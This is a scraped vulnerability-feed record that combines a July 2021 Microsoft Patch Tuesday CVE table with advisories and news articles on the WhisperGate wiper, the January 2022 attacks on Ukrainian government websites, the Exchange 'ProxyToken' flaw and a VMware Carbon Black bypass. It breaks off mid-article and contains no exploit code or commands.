\n[CVE-2021-34455](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34455>) | Windows File History Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-33774](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33774>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-33759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33759>) | Windows Desktop Bridge Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34525](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34525>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-34461](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34461>) | Windows Container Isolation FS Filter Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34488](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34488>) | Windows Console Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-33784](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33784>) | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34462](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34462>) | Windows AppX Deployment Extensions Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-34459](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34459>) | Windows AppContainer Elevation Of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-33785](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33785>) | Windows AF_UNIX Socket Provider Denial of Service Vulnerability | No | No | 7.5 | No 
\n[CVE-2021-33779](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33779>) | Windows ADFS Security Feature Bypass Vulnerability | No | Yes | 8.1 | Yes \n[CVE-2021-34491](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34491>) | Win32k Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-34449](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34449>) | Win32k Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-34509](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34509>) | Storage Spaces Controller Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-34460](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34460>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34510](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34510>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34512](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34512>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34513](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34513>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-33751](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33751>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-34521](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34521>) | Raw Image Extension Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-34439](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34439>) | Microsoft Windows Media Foundation Remote Code 
Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-34503](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34503>) | Microsoft Windows Media Foundation Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-33760](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33760>) | Media Foundation Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-31947](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31947>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-33775](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33775>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-33776](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33776>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-33777](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33777>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-33778](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33778>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-34489](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34489>) | DirectWrite Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-33781](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33781>) | Active Directory Security Feature Bypass Vulnerability | No | Yes | 8.1 | No \n \n## Windows ESU Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-31183](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31183>) | Windows TCP/IP Driver Denial of Service Vulnerability | No | No 
| 7.5 | No \n[CVE-2021-33757](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33757>) | Windows Security Account Manager Remote Protocol Security Feature Bypass Vulnerability | No | No | 5.3 | Yes \n[CVE-2021-33783](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33783>) | Windows SMB Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2021-34507](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34507>) | Windows Remote Assistance Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2021-34457](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34457>) | Windows Remote Access Connection Manager Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-34456](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34456>) | Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34527](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34527>) | Windows Print Spooler Remote Code Execution Vulnerability | Yes | Yes | 8.8 | Yes \n[CVE-2021-34497](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34497>) | Windows MSHTML Platform Remote Code Execution Vulnerability | No | No | 6.8 | Yes \n[CVE-2021-34447](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34447>) | Windows MSHTML Platform Remote Code Execution Vulnerability | No | No | 6.8 | Yes \n[CVE-2021-33786](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33786>) | Windows LSA Security Feature Bypass Vulnerability | No | No | 8.1 | Yes \n[CVE-2021-33788](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33788>) | Windows LSA Denial of Service Vulnerability | No | No | 7.5 | No 
\n[CVE-2021-33764](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33764>) | Windows Key Distribution Center Information Disclosure Vulnerability | No | No | 5.9 | Yes \n[CVE-2021-34500](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34500>) | Windows Kernel Memory Information Disclosure Vulnerability | No | No | 6.3 | Yes \n[CVE-2021-31979](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31979>) | Windows Kernel Elevation of Privilege Vulnerability | Yes | No | 7.8 | No \n[CVE-2021-34514](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34514>) | Windows Kernel Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-33765](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33765>) | Windows Installer Spoofing Vulnerability | No | No | 6.2 | No \n[CVE-2021-34511](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34511>) | Windows Installer Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34446](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34446>) | Windows HTML Platforms Security Feature Bypass Vulnerability | No | No | 8 | No \n[CVE-2021-34496](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34496>) | Windows GDI Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-34498](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34498>) | Windows GDI Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-33749](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33749>) | Windows DNS Snap-in Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-33750](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33750>) | Windows DNS Snap-in Remote Code Execution Vulnerability | No | No | 8.8 | Yes 
\n[CVE-2021-33752](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33752>) | Windows DNS Snap-in Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-33756](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33756>) | Windows DNS Snap-in Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-34494](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34494>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-33780](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33780>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-33746](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33746>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 8 | No \n[CVE-2021-33754](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33754>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 8 | No \n[CVE-2021-34442](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34442>) | Windows DNS Server Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-34444](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34444>) | Windows DNS Server Denial of Service Vulnerability | No | No | 6.5 | Yes \n[CVE-2021-34499](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34499>) | Windows DNS Server Denial of Service Vulnerability | No | No | 6.5 | No \n[CVE-2021-33745](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33745>) | Windows DNS Server Denial of Service Vulnerability | No | No | 6.5 | Yes \n[CVE-2021-34492](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34492>) | Windows Certificate Spoofing Vulnerability | No | Yes | 8.1 | No 
\n[CVE-2021-33782](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33782>) | Windows Authenticode Spoofing Vulnerability | No | No | 5.5 | No \n[CVE-2021-34504](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34504>) | Windows Address Book Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-34516](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34516>) | Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34448](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34448>) | Scripting Engine Memory Corruption Vulnerability | Yes | No | 6.8 | Yes \n[CVE-2021-34441](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34441>) | Microsoft Windows Media Foundation Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-34440](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34440>) | GDI+ Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-34476](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34476>) | Bowser.sys Denial of Service Vulnerability | No | No | 7.5 | No \n \n## Summary Graphs\n\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-13T20:56:26", "type": "rapid7blog", "title": "Patch Tuesday - July 2021", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-31183", "CVE-2021-31196", "CVE-2021-31206", "CVE-2021-31947", "CVE-2021-31961", "CVE-2021-31979", "CVE-2021-31984", "CVE-2021-33740", "CVE-2021-33743", "CVE-2021-33744", "CVE-2021-33745", "CVE-2021-33746", "CVE-2021-33749", "CVE-2021-33750", "CVE-2021-33751", "CVE-2021-33752", "CVE-2021-33753", "CVE-2021-33754", "CVE-2021-33755", "CVE-2021-33756", "CVE-2021-33757", "CVE-2021-33758", "CVE-2021-33759", "CVE-2021-33760", "CVE-2021-33761", "CVE-2021-33763", "CVE-2021-33764", "CVE-2021-33765", "CVE-2021-33766", "CVE-2021-33767", "CVE-2021-33768", "CVE-2021-33771", "CVE-2021-33772", "CVE-2021-33773", "CVE-2021-33774", "CVE-2021-33775", "CVE-2021-33776", "CVE-2021-33777", "CVE-2021-33778", "CVE-2021-33779", "CVE-2021-33780", "CVE-2021-33781", "CVE-2021-33782", "CVE-2021-33783", "CVE-2021-33784", "CVE-2021-33785", "CVE-2021-33786", "CVE-2021-33788", "CVE-2021-34438", "CVE-2021-34439", "CVE-2021-34440", "CVE-2021-34441", "CVE-2021-34442", "CVE-2021-34444", "CVE-2021-34445", "CVE-2021-34446", "CVE-2021-34447", "CVE-2021-34448", "CVE-2021-34449", "CVE-2021-34450", "CVE-2021-34451", "CVE-2021-34452", "CVE-2021-34454", "CVE-2021-34455", "CVE-2021-34456", "CVE-2021-34457", "CVE-2021-34458", "CVE-2021-34459", "CVE-2021-34460", "CVE-2021-34461", "CVE-2021-34462", "CVE-2021-34464", "CVE-2021-34466", "CVE-2021-34467", "CVE-2021-34468", "CVE-2021-34469", "CVE-2021-34470", "CVE-2021-34473", "CVE-2021-34474", "CVE-2021-34476", "CVE-2021-34477", "CVE-2021-34479", "CVE-2021-34488", "CVE-2021-34489", "CVE-2021-34490", "CVE-2021-34491", "CVE-2021-34492", "CVE-2021-34493", "CVE-2021-34494", "CVE-2021-34496", 
"CVE-2021-34497", "CVE-2021-34498", "CVE-2021-34499", "CVE-2021-34500", "CVE-2021-34501", "CVE-2021-34503", "CVE-2021-34504", "CVE-2021-34507", "CVE-2021-34508", "CVE-2021-34509", "CVE-2021-34510", "CVE-2021-34511", "CVE-2021-34512", "CVE-2021-34513", "CVE-2021-34514", "CVE-2021-34516", "CVE-2021-34517", "CVE-2021-34518", "CVE-2021-34519", "CVE-2021-34520", "CVE-2021-34521", "CVE-2021-34522", "CVE-2021-34523", "CVE-2021-34525", "CVE-2021-34527", "CVE-2021-34528", "CVE-2021-34529"], "modified": "2021-07-13T20:56:26", "id": "RAPID7BLOG:4B35B23167A9D5E016537F6A81E4E9D4", "href": "https://blog.rapid7.com/2021/07/13/patch-tuesday-july-2021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hivepro": [{"lastseen": "2022-01-20T15:30:50", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here. A malware attack was carried out on Ukrainian government, non-profit, and IT entities with a wiper disguised as ransomware. The threat actor, DEV-0586, targeted government bodies that provide critical executive branch or emergency response functions. The attack using the malware \u201cWhispergate\u201d was performed in two stages: Stage 1: The malware overwrites the Master Boot Record to display a fake ransom note that requests the payment of a $10,000 ransom in bitcoin. Stage 2: Stage2.exe is a downloader for the second-stage malware, which corrupts files and is hosted on a Discord channel. After that, the file corrupter searches for files with hundreds of different extensions, overwrites their contents with a predetermined quantity of 0xCC bytes, and renames each file with an apparently random four-byte extension. This attack is intended to be destructive and designed to render targeted devices inoperable rather than to obtain a ransom. Previously, on 13th of January, an attack by UNC1151 targeted at least 15 websites belonging to various Ukrainian public institutions, which were compromised, defaced, and subsequently taken offline. 
The attackers carried out a supply chain attack by exploiting the vulnerability CVE-2021-32648 in October CMS, a free content management system. By exploiting this vulnerability, the hackers could send a password reset request for an account in the system and then gain access to it. The two attacks have not been linked at present, but there is a strong possibility that they were carried out simultaneously. To mitigate the risk, organizations are advised to update October CMS to the latest version and to monitor their systems for the listed IoC hashes. Actor Details, Vulnerability Details, Indicators of Compromise (IoCs): tables not included in this excerpt. Patch Link: https://github.com/octobercms/october/security/advisories/GHSA-mxr5-mc97-63rc References: https://cert.gov.ua/article/17899 https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/ https://securityaffairs.co/wordpress/126782/apt/destructive-malware-campaign-targets-ukraine.html?utm_source=rss&utm_medium=rss&utm_campaign=destructive-malware-campaign-targets-ukraine https://ain.ua/en/2022/01/14/hackers-attack-some-ukrainian-government-websites/", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.2}, "published": "2022-01-17T14:38:43", "type": "hivepro", "title": "Ukraine government entities targeted by a destructive malware \u201cWhispergate\u201d", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", 
"baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32648"], "modified": "2022-01-17T14:38:43", "id": "HIVEPRO:117C06FAB305E3556D7D341CD4305EA7", "href": "https://www.hivepro.com/ukraine-government-entities-targeted-by-a-destructive-malware-whispergate/", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "thn": [{"lastseen": "2022-05-09T12:37:42", "description": "No fewer than 70 websites operated by the Ukrainian government went offline on Friday for hours in what appears to be a coordinated cyber attack amid heightened tensions with Russia.\n\n\"As a result of a massive cyber attack, the websites of the Ministry of Foreign Affairs and a number of other government agencies are temporarily down,\" Oleg Nikolenko, MFA spokesperson, [tweeted](<https://twitter.com/OlegNikolenko_/status/1481880668195983362>).\n\nThe Security Service of Ukraine, the country's law-enforcement authority, [alluded](<https://ssu.gov.ua/novyny/sbu-rozsliduie-prychetnist-rosiiskykh-spetssluzhb-do-sohodnishnoi-kiberataky-na-orhany-derzhavnoi-vlady-ukrainy>) to a possible Russian involvement, pointing fingers at the hacker groups associated with the Russian secret services while branding the intrusions as a supply chain attack that involved hacking the \"infrastructure of a commercial company that had access to the rights to administer the web resources affected by the attack.\"\n\nPrior to the update from the SSU, the [Ukrainian CERT](<https://cert.gov.ua/article/17899>) claimed that the attacks may have exploited a security vulnerability in Laravel-based 
October CMS ([CVE-2021-32648](<https://nvd.nist.gov/vuln/detail/CVE-2021-32648>)), which could be abused by an adversary to gain access to an account using a specially crafted request.\n\nThe breach targeted a number of government websites, including those for Ukraine's Cabinet, education, agriculture, emergency, energy, veterans affairs, and environment ministries, among others, 10 websites of which were \"subjected to unauthorized interference.\"\n\nThe security agency, however, stressed that content of the sites was not altered and that no sensitive personal data was stolen.\n\n\"Provocative messages were posted on the main page of the websites,\" the SSU [said](<https://ssu.gov.ua/en/novyny/shchodo-aktak-na-saity-derzhavnykh-orhaniv>). \"The content of the sites was not changed, and, according to preliminary information, no leakage of personal data occurred.\"\n\nThis is far from the first time Russia has set its sights on Ukraine. In December 2015, a nation-state adversary tracked as [Sandworm](<https://malpedia.caad.fkie.fraunhofer.de/actor/sandworm>) [targeted](<https://en.wikipedia.org/wiki/Ukraine_power_grid_hack>) the power grid, resulting in unprecedented blackouts for roughly 230,000 consumers in the nation.\n\nTwo years later, Ukraine was also at the receiving end of the devastating [NotPetya](<https://en.wikipedia.org/wiki/2017_cyberattacks_on_Ukraine>) wiper malware campaign by the Sandworm military hackers that erased confidential data from the computers of banks and energy firms.\n\nThen in November 2021, the SSU [unmasked](<https://thehackernews.com/2021/11/ukraine-identifies-russian-fsb-officers.html>) the real identities of five Russian intelligence officials allegedly involved in over 5,000 cyberattacks attributed to a cyber-espionage group named Gamaredon aimed at public authorities and critical infrastructure located in the country.\n\n\"The purpose of such attacks is to destabilize the internal situation in the country, as well as to sow 
chaos and disbelief in society,\" the Center for Strategic Communications and Information Security [said](<https://spravdi.gov.ua/ataka-na-uryadovi-sajty-novyj-rozdil-kibervijny-proty-ukrayiny/>), noting the hacks amount to \"psychological pressure and intimidation.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-01-15T06:27:00", "type": "thn", "title": "Massive Cyber Attack Knocks Down Ukrainian Government Websites", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32648"], "modified": "2022-01-15T07:17:34", "id": "THN:03D48DF1CC21CC194B892C2E186448B5", "href": "https://thehackernews.com/2022/01/massive-cyber-attack-knocks-down.html", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2022-05-09T12:37:22", "description": 
"Details have emerged about a now-patched security vulnerability impacting Microsoft Exchange Server that could be weaponized by an unauthenticated attacker to modify server configurations, thus leading to the disclosure of Personally Identifiable Information (PII).\n\nThe issue, tracked as [CVE-2021-33766](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33766>) (CVSS score: 7.3) and coined \"**ProxyToken**,\" was discovered by Le Xuan Tuyen, a researcher at the Information Security Center of Vietnam Posts and Telecommunications Group (VNPT-ISC), and reported through the Zero-Day Initiative (ZDI) program in March 2021.\n\n\"With this vulnerability, an unauthenticated attacker can perform configuration actions on mailboxes belonging to arbitrary users,\" the ZDI [said](<https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server>) Monday. 
\"As an illustration of the impact, this can be used to copy all emails addressed to a target and account and forward them to an account controlled by the attacker.\"\n\nMicrosoft addressed the issue as part of its [Patch Tuesday updates](<https://thehackernews.com/2021/07/update-your-windows-pcs-to-patch-117.html>) for July 2021.\n\nThe security shortcoming resides in a feature called Delegated Authentication, which refers to a mechanism whereby the front-end website \u2014 the Outlook web access (OWA) client \u2014 passes authentication requests directly to the back-end when it detects the presence of a SecurityToken cookie.\n\nHowever, since Exchange has to be specifically configured to use the feature and have the back-end carry out the checks, it leads to a scenario in which the module handling this delegation (\"DelegatedAuthModule\") isn't loaded under default configuration, culminating in a bypass as the back-end fails to authenticate incoming requests based on the SecurityToken cookie.\n\n\"The net result is that requests can sail through, without being subjected to authentication on either the front or back end,\" ZDI's Simon Zuckerbraun explained.\n\nThe disclosure adds to a growing list of Exchange Server vulnerabilities that have come to light this year, including [ProxyLogon](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>), [ProxyOracle](<https://thehackernews.com/2021/08/hackers-actively-searching-for.html>), and [ProxyShell](<https://thehackernews.com/2021/08/microsoft-exchange-under-attack-with.html>), which have been actively exploited by threat actors to take over unpatched servers, deploy malicious web shells and file-encrypting ransomware such as [LockFile](<https://thehackernews.com/2021/08/lockfile-ransomware-bypasses-protection.html>).\n\nTroublingly, 
in-the-wild exploit attempts abusing ProxyToken have already been recorded as early as August 10, [according](<https://twitter.com/buffaloverflow/status/1432364885804036097>) to NCC Group security researcher Rich Warren, making it imperative that customers move quickly to apply the security updates from Microsoft.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-08-31T03:27:00", "type": "thn", "title": "New Microsoft Exchange 'ProxyToken' Flaw Lets Attackers Reconfigure Mailboxes", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766"], "modified": "2021-08-31T06:47:57", "id": "THN:348286B051EE300B46D60D90A16A5CCB", "href": "https://thehackernews.com/2021/08/new-microsoft-exchange-proxytoken-flaw.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-09T12:38:23", "description": 
"A critical vulnerability in the VMware Carbon Black Cloud Workload appliance could be exploited to bypass authentication and take control of vulnerable systems.\n\nTracked as CVE-2021-21982, the flaw is rated 9.1 out of a maximum of 10 in the CVSS scoring system and affects all versions of the product prior to 1.0.1. \n\nCarbon Black Cloud Workload is a data center security product from VMware that aims to protect critical servers and workloads hosted on vSphere, the company's cloud-computing virtualization platform.\n\n\"A URL on the administrative interface of the VMware Carbon Black Cloud Workload appliance can be manipulated to bypass authentication,\" VMware [said](<https://www.vmware.com/security/advisories/VMSA-2021-0005.html>) in its advisory, thereby allowing an adversary with network access to the interface to gain access to the administration API of the appliance.\n\nArmed with the access, a malicious actor can then view and alter [administrative configuration settings](<https://docs.vmware.com/en/VMware-Carbon-Black-Cloud-Workload/1.0/carbonblack_workload/GUID-E2ED3713-315B-4EEE-A3E8-A7A09A011101.html>), the company added.\n\nIn addition to releasing a fix for CVE-2021-21982, VMware has also [addressed](<https://www.vmware.com/security/advisories/VMSA-2021-0004.html>) two separate bugs in its vRealize Operations Manager solution that an attacker with network access to the API could exploit to carry out Server Side Request Forgery ([SSRF](<https://www.acunetix.com/blog/articles/server-side-request-forgery-vulnerability/>)) attacks to steal administrative credentials (CVE-2021-21975) and write files to arbitrary locations on the underlying [photon](<https://github.com/vmware/photon>) operating system (CVE-2021-21983).\n\nThe product is primarily designed to monitor and optimize the performance of the virtual 
